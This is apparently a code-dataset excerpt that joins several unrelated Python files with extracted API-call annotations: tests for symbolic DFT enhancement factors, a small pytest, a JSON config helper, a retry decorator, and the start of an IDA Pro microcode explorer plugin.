np.testing.assert_allclose(f_cos, expected_f_cos)
def test_convert_enhancement_factor_to_and_from_dict(self):
self.assertEqual(
self.enhancement_factor,
enhancement_factors.EnhancementFactor.from_dict(
self.enhancement_factor.to_dict()))
@parameterized.parameters(
enhancement_factors.f_empty,
enhancement_factors.f_lda,
enhancement_factors.f_b97_u,
enhancement_factors.f_b97_u_short,
enhancement_factors.f_b97_x2,
enhancement_factors.f_b97_x2_short,
enhancement_factors.f_x_wb97mv,
enhancement_factors.f_css_wb97mv,
enhancement_factors.f_cos_wb97mv,
enhancement_factors.f_x_wb97mv_short,
enhancement_factors.f_css_wb97mv_short,
enhancement_factors.f_cos_wb97mv_short,
)
def test_make_isomorphic_copy(self, enhancement_factor):
features = {
feature_name: np.random.rand(5)
for feature_name in enhancement_factor.feature_names
}
shared_parameters = {
parameter_name: np.random.rand()
for parameter_name in enhancement_factor.shared_parameter_names
}
renamed_shared_parameters = {
(enhancement_factor._isomorphic_copy_shared_parameter_prefix
+ str(index)): value
for index, value in enumerate(shared_parameters.values())
}
bound_parameters = {
parameter_name: np.random.rand()
for parameter_name in enhancement_factor.bound_parameter_names
}
enhancement_factor_copy = enhancement_factor.make_isomorphic_copy()
np.testing.assert_allclose(
enhancement_factor.eval(
features=features, parameters={
**shared_parameters, **bound_parameters}),
enhancement_factor_copy.eval(
features=features, parameters={
**renamed_shared_parameters, **bound_parameters})
)
def test_make_isomorphic_copy_of_f_x_wb97mv_short(self):
f_x_wb97mv_copy = enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy(
feature_names=['rho', 'x2', 'w'],
num_shared_parameters=10,
num_variables=10)
self.assertEqual(f_x_wb97mv_copy.feature_names, ['rho', 'x2', 'w'])
self.assertEqual(f_x_wb97mv_copy.num_shared_parameters, 10)
self.assertEqual(
f_x_wb97mv_copy.shared_parameter_names,
[f_x_wb97mv_copy._isomorphic_copy_shared_parameter_prefix + str(index)
for index in range(10)])
self.assertEqual(
f_x_wb97mv_copy.variable_names,
[f_x_wb97mv_copy._isomorphic_copy_variable_prefix + str(index)
for index in range(9)] + ['enhancement_factor'])
def test_make_isomorphic_copy_enhancement_factor_variable_location(self):
f_x_wb97mv_shuffled = copy.deepcopy(enhancement_factors.f_x_wb97mv_short)
f_x_wb97mv_shuffled.variable_names.remove('enhancement_factor')
f_x_wb97mv_shuffled.variable_names.insert(
np.random.randint(len(f_x_wb97mv_shuffled.variable_names)),
'enhancement_factor')
self.assertEqual(
enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy(),
f_x_wb97mv_shuffled.make_isomorphic_copy())
def test_make_isomorphic_copy_repeated_feature_names(self):
with self.assertRaisesRegex(
ValueError, 'Repeated feature names'):
enhancement_factors.f_b97_u.make_isomorphic_copy(
feature_names=['u', 'u'])
def test_make_isomorphic_copy_wrong_feature_names(self):
with self.assertRaisesRegex(
ValueError,
r"feature_names \['rho', 'x2'\] is not a superset of feature_names of "
r"current instance \['w', 'x2'\]"):
enhancement_factors.f_x_wb97mv.make_isomorphic_copy(
feature_names=['rho', 'x2'])
def test_make_isomorphic_copy_wrong_num_shared_parameters(self):
with self.assertRaisesRegex(
ValueError, 'num_shared_parameters 5 is smaller than '
'that of current instance 6'):
enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy(
num_shared_parameters=5)
def test_make_isomorphic_copy_wrong_num_variables(self):
with self.assertRaisesRegex(
ValueError, 'num_variables 3 is smaller than '
'that of current instance 5'):
enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy(
num_variables=3)
@parameterized.parameters(
(enhancement_factors.f_b97_u, 3),
(enhancement_factors.f_b97_u_short, 3),
(enhancement_factors.f_b97_x2, 4),
(enhancement_factors.f_b97_x2_short, 4),
(enhancement_factors.f_x_wb97mv_short, 4),)
def test_num_used_parameters(
self, enhancement_factor, expected_num_used_parameters):
self.assertEqual(enhancement_factor.num_used_parameters,
expected_num_used_parameters)
self.assertEqual(
enhancement_factor.make_isomorphic_copy(
num_shared_parameters=20).num_used_parameters,
expected_num_used_parameters)
def test_get_symbolic_expression(self):
c0, c1, c2, gamma, x = sympy.symbols(
'c0 c1 c2 gamma_utransform x')
self.assertEqual(
enhancement_factors.f_b97_x2_short.get_symbolic_expression(
latex=False, simplify=False),
(c0 + c1 * gamma * x ** 2 / (gamma * x ** 2 + 1.)
+ c2 * gamma ** 2 * x ** 4 / (gamma * x ** 2 + 1.) ** 2))
def test_get_symbolic_expression_latex(self):
self.assertEqual(
enhancement_factors.f_b97_x2_short.get_symbolic_expression(
latex=True, simplify=False),
r'c_{0} + \frac{c_{1} \gamma_{u} x^{2}}{\gamma_{u} x^{2} + 1.0} + '
r'\frac{c_{2} \gamma_{u}^{2} x^{4}}{\left(\gamma_{u} x^{2} + '
r'1.0\right)^{2}}')
if __name__ == '__main__':
absltest.main()
| [
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.eval",
"numpy.random.rand",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.get_symbolic_expression",
"symbolic_f... | [((1008, 1049), 'jax.config.update', 'jax.config.update', (['"""jax_enable_x64"""', '(True)'], {}), "('jax_enable_x64', True)\n", (1025, 1049), False, 'import jax\n'), ((6022, 6059), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (6046, 6059), False, 'from absl.testing import parameterized\n'), ((6499, 6536), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (6523, 6536), False, 'from absl.testing import parameterized\n'), ((7010, 7047), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (7034, 7047), False, 'from absl.testing import parameterized\n'), ((7533, 7570), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (7557, 7570), False, 'from absl.testing import parameterized\n'), ((8075, 8112), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (8099, 8112), False, 'from absl.testing import parameterized\n'), ((8640, 8932), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (["(enhancement_factors.f_x_wb97mv, enhancement_factors.f_css_wb97mv,\n enhancement_factors.f_cos_wb97mv, 'gamma')", "(enhancement_factors.f_x_wb97mv_short, enhancement_factors.\n f_css_wb97mv_short, enhancement_factors.f_cos_wb97mv_short,\n 'gamma_utransform')"], {}), "((enhancement_factors.f_x_wb97mv,\n enhancement_factors.f_css_wb97mv, enhancement_factors.f_cos_wb97mv,\n 'gamma'), (enhancement_factors.f_x_wb97mv_short, enhancement_factors.\n f_css_wb97mv_short, enhancement_factors.f_cos_wb97mv_short,\n 'gamma_utransform'))\n", (8664, 8932), False, 'from absl.testing import parameterized\n'), ((11615, 12069), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['enhancement_factors.f_empty', 
'enhancement_factors.f_lda', 'enhancement_factors.f_b97_u', 'enhancement_factors.f_b97_u_short', 'enhancement_factors.f_b97_x2', 'enhancement_factors.f_b97_x2_short', 'enhancement_factors.f_x_wb97mv', 'enhancement_factors.f_css_wb97mv', 'enhancement_factors.f_cos_wb97mv', 'enhancement_factors.f_x_wb97mv_short', 'enhancement_factors.f_css_wb97mv_short', 'enhancement_factors.f_cos_wb97mv_short'], {}), '(enhancement_factors.f_empty, enhancement_factors.\n f_lda, enhancement_factors.f_b97_u, enhancement_factors.f_b97_u_short,\n enhancement_factors.f_b97_x2, enhancement_factors.f_b97_x2_short,\n enhancement_factors.f_x_wb97mv, enhancement_factors.f_css_wb97mv,\n enhancement_factors.f_cos_wb97mv, enhancement_factors.f_x_wb97mv_short,\n enhancement_factors.f_css_wb97mv_short, enhancement_factors.\n f_cos_wb97mv_short)\n', (11639, 12069), False, 'from absl.testing import parameterized\n'), ((15622, 15854), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(enhancement_factors.f_b97_u, 3)', '(enhancement_factors.f_b97_u_short, 3)', '(enhancement_factors.f_b97_x2, 4)', '(enhancement_factors.f_b97_x2_short, 4)', '(enhancement_factors.f_x_wb97mv_short, 4)'], {}), '((enhancement_factors.f_b97_u, 3), (\n enhancement_factors.f_b97_u_short, 3), (enhancement_factors.f_b97_x2, 4\n ), (enhancement_factors.f_b97_x2_short, 4), (enhancement_factors.\n f_x_wb97mv_short, 4))\n', (15646, 15854), False, 'from absl.testing import parameterized\n'), ((17014, 17029), 'absl.testing.absltest.main', 'absltest.main', ([], {}), '()\n', (17027, 17029), False, 'from absl.testing import absltest\n'), ((6453, 6494), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (6479, 6494), True, 'import numpy as np\n'), ((6655, 6672), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (6669, 6672), True, 'import numpy as np\n'), ((6681, 6708), 'symbolic_functionals.syfes.xc.gga.u_b97', 'gga.u_b97', (['x'], {'gamma': 
'gamma_x'}), '(x, gamma=gamma_x)\n', (6690, 6708), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((6726, 6738), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (6735, 6738), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((6748, 6890), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u.eval', 'enhancement_factors.f_b97_u.eval', ([], {'features': "{'u': u}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}", 'use_jax': 'use_jax'}), "(features={'u': u}, parameters={'c0':\n coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}, use_jax=use_jax)\n", (6780, 6890), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((6964, 7005), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (6990, 7005), True, 'import numpy as np\n'), ((7172, 7189), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (7186, 7189), True, 'import numpy as np\n'), ((7198, 7225), 'symbolic_functionals.syfes.xc.gga.u_b97', 'gga.u_b97', (['x'], {'gamma': 'gamma_x'}), '(x, gamma=gamma_x)\n', (7207, 7225), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((7243, 7255), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (7252, 7255), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((7265, 7413), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u_short.eval', 'enhancement_factors.f_b97_u_short.eval', ([], {'features': "{'u': u}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}", 'use_jax': 'use_jax'}), "(features={'u': u}, parameters={'c0':\n coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}, use_jax=use_jax)\n", (7303, 7413), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((7487, 7528), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', 
(7513, 7528), True, 'import numpy as np\n'), ((7690, 7707), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (7704, 7707), True, 'import numpy as np\n'), ((7759, 7771), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (7768, 7771), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((7781, 7948), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2.eval', 'enhancement_factors.f_b97_x2.eval', ([], {'features': "{'x2': x2}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2], 'gamma': gamma_x}", 'use_jax': 'use_jax'}), "(features={'x2': x2}, parameters={'c0':\n coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2], 'gamma': gamma_x},\n use_jax=use_jax)\n", (7814, 7948), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((8029, 8070), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (8055, 8070), True, 'import numpy as np\n'), ((8238, 8255), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (8252, 8255), True, 'import numpy as np\n'), ((8307, 8319), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (8316, 8319), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((8329, 8514), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.eval', 'enhancement_factors.f_b97_x2_short.eval', ([], {'features': "{'x2': x2}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2],\n 'gamma_utransform': gamma_x}", 'use_jax': 'use_jax'}), "(features={'x2': x2}, parameters={\n 'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2],\n 'gamma_utransform': gamma_x}, use_jax=use_jax)\n", (8368, 8514), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((8594, 8635), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (8620, 8635), True, 'import 
numpy as np\n'), ((9237, 9254), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (9251, 9254), True, 'import numpy as np\n'), ((9263, 9280), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (9277, 9280), True, 'import numpy as np\n'), ((9291, 9308), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (9305, 9308), True, 'import numpy as np\n'), ((9351, 9393), 'symbolic_functionals.syfes.xc.mgga.get_mgga_t', 'mgga.get_mgga_t', (['rho', 'tau'], {'polarized': '(False)'}), '(rho, tau, polarized=False)\n', (9366, 9393), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((9439, 9566), 'symbolic_functionals.syfes.xc.mgga.f_b97m', 'mgga.f_b97m', (['x', 't'], {'gamma': "mgga.WB97MV_PARAMS['gamma_x']", 'power_series': "mgga.WB97MV_PARAMS['power_series_x']", 'polarized': '(False)'}), "(x, t, gamma=mgga.WB97MV_PARAMS['gamma_x'], power_series=mgga.\n WB97MV_PARAMS['power_series_x'], polarized=False)\n", (9450, 9566), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((9600, 9729), 'symbolic_functionals.syfes.xc.mgga.f_b97m', 'mgga.f_b97m', (['x', 't'], {'gamma': "mgga.WB97MV_PARAMS['gamma_ss']", 'power_series': "mgga.WB97MV_PARAMS['power_series_ss']", 'polarized': '(False)'}), "(x, t, gamma=mgga.WB97MV_PARAMS['gamma_ss'], power_series=mgga.\n WB97MV_PARAMS['power_series_ss'], polarized=False)\n", (9611, 9729), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((9763, 9892), 'symbolic_functionals.syfes.xc.mgga.f_b97m', 'mgga.f_b97m', (['x', 't'], {'gamma': "mgga.WB97MV_PARAMS['gamma_os']", 'power_series': "mgga.WB97MV_PARAMS['power_series_os']", 'polarized': '(False)'}), "(x, t, gamma=mgga.WB97MV_PARAMS['gamma_os'], power_series=mgga.\n WB97MV_PARAMS['power_series_os'], polarized=False)\n", (9774, 9892), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((11234, 11279), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f_x', 'expected_f_x'], {}), '(f_x, expected_f_x)\n', (11260, 
11279), True, 'import numpy as np\n'), ((11284, 11333), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f_css', 'expected_f_css'], {}), '(f_css, expected_f_css)\n', (11310, 11333), True, 'import numpy as np\n'), ((11338, 11387), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f_cos', 'expected_f_cos'], {}), '(f_cos, expected_f_cos)\n', (11364, 11387), True, 'import numpy as np\n'), ((13279, 13419), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', ([], {'feature_names': "['rho', 'x2', 'w']", 'num_shared_parameters': '(10)', 'num_variables': '(10)'}), "(feature_names=[\n 'rho', 'x2', 'w'], num_shared_parameters=10, num_variables=10)\n", (13336, 13419), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((14054, 14105), 'copy.deepcopy', 'copy.deepcopy', (['enhancement_factors.f_x_wb97mv_short'], {}), '(enhancement_factors.f_x_wb97mv_short)\n', (14067, 14105), False, 'import copy\n'), ((16317, 16361), 'sympy.symbols', 'sympy.symbols', (['"""c0 c1 c2 gamma_utransform x"""'], {}), "('c0 c1 c2 gamma_utransform x')\n", (16330, 16361), False, 'import sympy\n'), ((1281, 1298), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (1295, 1298), True, 'import numpy as np\n'), ((1403, 1419), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (1417, 1419), True, 'import numpy as np\n'), ((1526, 1542), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (1540, 1542), True, 'import numpy as np\n'), ((1666, 1677), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (1674, 1677), True, 'import numpy as np\n'), ((3100, 3226), 'symbolic_functionals.syfes.symbolic.enhancement_factors.EnhancementFactor', 'enhancement_factors.EnhancementFactor', ([], {'feature_names': '[]', 'shared_parameter_names': '[]', 'variable_names': '[]', 'instruction_list': '[]'}), '(feature_names=[],\n 
shared_parameter_names=[], variable_names=[], instruction_list=[])\n', (3137, 3226), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((3399, 3559), 'symbolic_functionals.syfes.symbolic.enhancement_factors.EnhancementFactor', 'enhancement_factors.EnhancementFactor', ([], {'feature_names': "['var']", 'shared_parameter_names': "['var']", 'variable_names': "['enhancement_factor']", 'instruction_list': '[]'}), "(feature_names=['var'],\n shared_parameter_names=['var'], variable_names=['enhancement_factor'],\n instruction_list=[])\n", (3436, 3559), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((4093, 4144), 'symbolic_functionals.syfes.symbolic.instructions.Power2Instruction', 'instructions.Power2Instruction', (['"""variable_0"""', '"""var"""'], {}), "('variable_0', 'var')\n", (4123, 4144), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((4250, 4342), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""variable_0"""', '"""shared_parameter_1"""', '"""gamma_utransform"""'], {}), "('variable_0', 'shared_parameter_1',\n 'gamma_utransform')\n", (4282, 4342), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((4959, 5024), 'symbolic_functionals.syfes.symbolic.instructions.Power2Instruction', 'instructions.Power2Instruction', (['"""feature_0"""', '"""shared_parameter_0"""'], {}), "('feature_0', 'shared_parameter_0')\n", (4989, 5024), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((5151, 5236), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""feature_1"""', '"""shared_parameter_1"""', '"""variable_1"""'], {}), "('feature_1', 'shared_parameter_1',\n 'variable_1')\n", (5183, 5236), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((5385, 5458), 
'symbolic_functionals.syfes.symbolic.instructions.Power4Instruction', 'instructions.Power4Instruction', (['"""bound_parameter_1"""', '"""shared_parameter_1"""'], {}), "('bound_parameter_1', 'shared_parameter_1')\n", (5415, 5458), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((12219, 12236), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (12233, 12236), True, 'import numpy as np\n'), ((12354, 12370), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (12368, 12370), True, 'import numpy as np\n'), ((12703, 12719), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (12717, 12719), True, 'import numpy as np\n'), ((14349, 14408), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', ([], {}), '()\n', (14406, 14408), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((14611, 14685), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u.make_isomorphic_copy', 'enhancement_factors.f_b97_u.make_isomorphic_copy', ([], {'feature_names': "['u', 'u']"}), "(feature_names=['u', 'u'])\n", (14659, 14685), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((14940, 15025), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv.make_isomorphic_copy', 'enhancement_factors.f_x_wb97mv.make_isomorphic_copy', ([], {'feature_names': "['rho', 'x2']"}), "(feature_names=['rho', 'x2']\n )\n", (14991, 15025), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((15241, 15330), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', ([], {'num_shared_parameters': '(5)'}), '(\n num_shared_parameters=5)\n', (15300, 15330), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((15530, 15606), 
'symbolic_functionals.syfes.symbolic.enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', ([], {'num_variables': '(3)'}), '(num_variables=3)\n', (15589, 15606), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((16401, 16492), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.get_symbolic_expression', 'enhancement_factors.f_b97_x2_short.get_symbolic_expression', ([], {'latex': '(False)', 'simplify': '(False)'}), '(latex=False,\n simplify=False)\n', (16459, 16492), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((16707, 16797), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.get_symbolic_expression', 'enhancement_factors.f_b97_x2_short.get_symbolic_expression', ([], {'latex': '(True)', 'simplify': '(False)'}), '(latex=True,\n simplify=False)\n', (16765, 16797), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((1772, 1783), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (1780, 1783), True, 'import numpy as np\n'), ((2065, 2156), 'symbolic_functionals.syfes.symbolic.instructions.MultiplicationInstruction', 'instructions.MultiplicationInstruction', (['"""variable_0"""', '"""feature_0"""', '"""shared_parameter_0"""'], {}), "('variable_0', 'feature_0',\n 'shared_parameter_0')\n", (2103, 2156), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2183, 2268), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""variable_1"""', '"""feature_1"""', '"""shared_parameter_1"""'], {}), "('variable_1', 'feature_1',\n 'shared_parameter_1')\n", (2215, 2268), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2295, 2369), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""variable_1"""', 
'"""variable_1"""', '"""variable_0"""'], {}), "('variable_1', 'variable_1', 'variable_0')\n", (2327, 2369), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2400, 2466), 'symbolic_functionals.syfes.symbolic.instructions.Power2Instruction', 'instructions.Power2Instruction', (['"""enhancement_factor"""', '"""variable_1"""'], {}), "('enhancement_factor', 'variable_1')\n", (2430, 2466), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2480, 2558), 'symbolic_functionals.syfes.symbolic.instructions.UTransformInstruction', 'instructions.UTransformInstruction', (['"""enhancement_factor"""', '"""enhancement_factor"""'], {}), "('enhancement_factor', 'enhancement_factor')\n", (2514, 2558), False, 'from symbolic_functionals.syfes.symbolic import instructions\n')] |
import pytest
def test_cube():
    """cube() should raise its argument to the third power."""
    from demo.demo import cube
    result = cube(2)
    assert result == 8
| [
"demo.demo.cube"
] | [((74, 81), 'demo.demo.cube', 'cube', (['(2)'], {}), '(2)\n', (78, 81), False, 'from demo.demo import cube\n')] |
import json
from typing import Dict, TypeVar
from ..paths import config_dir_path, config_path
from ..cli.log import warn
# Type variable for the values stored in the JSON configuration mapping.
V = TypeVar("V")
class Config:
    """Read and write the application's JSON configuration file."""

    def __init__(self):
        # Recognized top-level configuration keys.
        self.options = [
            'wallpapers_folder'
        ]

    def check(self, create: bool=False):
        """Warn about a missing config dir/file; create them when *create* is set."""
        if not config_dir_path.is_dir():
            warn(f'Config dir path: {config_dir_path} not found')
            if create:
                config_dir_path.mkdir()
        if not config_path.is_file():
            warn(f'Config file path: {config_path} not found')
            if create:
                config_path.touch()
                # seed the new file with an empty JSON object
                self.dump({})

    def parse(self) -> Dict[str, V]:
        """Return the configuration file contents as a dict."""
        with open(config_path, 'r') as fp:
            return json.load(fp)

    def dump(self, new_dict: Dict[str, V]) -> Dict[str, V]:
        """Write *new_dict* to the config file, then return the parsed result."""
        with open(config_path, 'w') as fp:
            json.dump(new_dict, fp)
        return self.parse()
# Module-level singleton instance shared by importers of this module.
config = Config()
| [
"json.load",
"json.dump",
"typing.TypeVar"
] | [((126, 138), 'typing.TypeVar', 'TypeVar', (['"""V"""'], {}), "('V')\n", (133, 138), False, 'from typing import Dict, TypeVar\n'), ((752, 769), 'json.load', 'json.load', (['config'], {}), '(config)\n', (761, 769), False, 'import json\n'), ((890, 917), 'json.dump', 'json.dump', (['new_dict', 'config'], {}), '(new_dict, config)\n', (899, 917), False, 'import json\n')] |
import functools
from time import sleep
import logging
def retries(max_tries, should_retry, delay=1, backoff=2):
    """
    Decorator that implements exponential backoff retry logic. If you have
    a function that may fail, this decorator can catch the exception and retry at
    exponentially increasing intervals until the number of retries is exhausted.

    The should_retry parameter should be a function that takes an exception as an
    argument and returns True if the function should be retried or False to
    permanently fail. should_retry is only consulted while retries remain; the
    final failure is always re-raised.

    :param max_tries: total number of attempts before giving up
    :param should_retry: callable(exception) -> bool, retry predicate
    :param delay: initial sleep (seconds) before the first retry
    :param backoff: multiplier applied to the delay after each retry

    This is extremely useful when working with external APIs. There is a shortcut
    decorator for working with Google APIs, see :func:`google_api_retries`.
    """
    def dec(func):
        # BUGFIX: the wraps() result must decorate f2 (it was previously
        # discarded), otherwise the wrapper loses func's name/docstring.
        @functools.wraps(func)
        def f2(*args, **kwargs):
            seconds = delay
            # BUGFIX: range objects have no .reverse() on Python 3; count the
            # remaining tries down via reversed() instead.
            for tries_remaining in reversed(range(max_tries)):
                try:
                    return func(*args, **kwargs)
                except Exception as e:
                    logging.info("Caught %s with %s retries left" % (e, tries_remaining))
                    # only retry while attempts remain AND the predicate allows it
                    if tries_remaining > 0 and should_retry(e):
                        logging.info("Exception raised, retrying in %s seconds" % seconds)
                        sleep(seconds)
                        seconds *= backoff
                    else:
                        raise e
        return f2
    return dec
| [
"time.sleep",
"logging.info",
"functools.wraps"
] | [((733, 754), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (748, 754), False, 'import functools\n'), ((1055, 1124), 'logging.info', 'logging.info', (["('Caught %s with %s retries left' % (e, tries_remaining))"], {}), "('Caught %s with %s retries left' % (e, tries_remaining))\n", (1067, 1124), False, 'import logging\n'), ((1213, 1279), 'logging.info', 'logging.info', (["('Exception raised, retrying in %s seconds' % seconds)"], {}), "('Exception raised, retrying in %s seconds' % seconds)\n", (1225, 1279), False, 'import logging\n'), ((1304, 1318), 'time.sleep', 'sleep', (['seconds'], {}), '(seconds)\n', (1309, 1318), False, 'from time import sleep\n')] |
import ctypes
import ida_ida
import ida_funcs
import ida_graph
import ida_idaapi
import ida_kernwin
import ida_hexrays
from PyQt5 import QtWidgets, QtGui, QtCore, sip
from lucid.ui.sync import MicroCursorHighlight
from lucid.ui.subtree import MicroSubtreeView
from lucid.util.python import register_callback, notify_callback
from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels
from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position
#------------------------------------------------------------------------------
# Microcode Explorer
#------------------------------------------------------------------------------
#
# The Microcode Explorer UI is mostly implemented following a standard
# Model-View-Controller pattern. This is a little abnormal for Qt, but
# I've come to appreciate it more for its portability and testability.
#
class MicrocodeExplorer(object):
    """
    The controller component of the microcode explorer (MVC pattern).

    Translates user gestures into model updates and view changes. In theory
    this controller could drive the 'view' headlessly, or be used to simulate
    user UI interaction.
    """

    def __init__(self):
        self.model = MicrocodeExplorerModel()
        self.view = MicrocodeExplorerView(self, self.model)
        self.view._code_sync.enable_sync(True) # XXX/HACK

    def show(self, address=None):
        """
        Show the microcode explorer, seeded at the given (or current) address.
        """
        target = ida_kernwin.get_screen_ea() if address is None else address
        self.select_function(target)
        self.view.show()

    def show_subtree(self, insn_token):
        """
        Show the sub-instruction graph for the given instruction token.
        """
        graph = MicroSubtreeView(insn_token.insn)
        graph.show()

        # TODO/HACK: this is dumb, but moving it breaks my centering code so
        # i'll figure it out later...
        viewer = ida_graph.get_graph_viewer(graph.GetWidget())
        ida_graph.viewer_set_titlebar_height(viewer, 15)

    #-------------------------------------------------------------------------
    # View Toggles
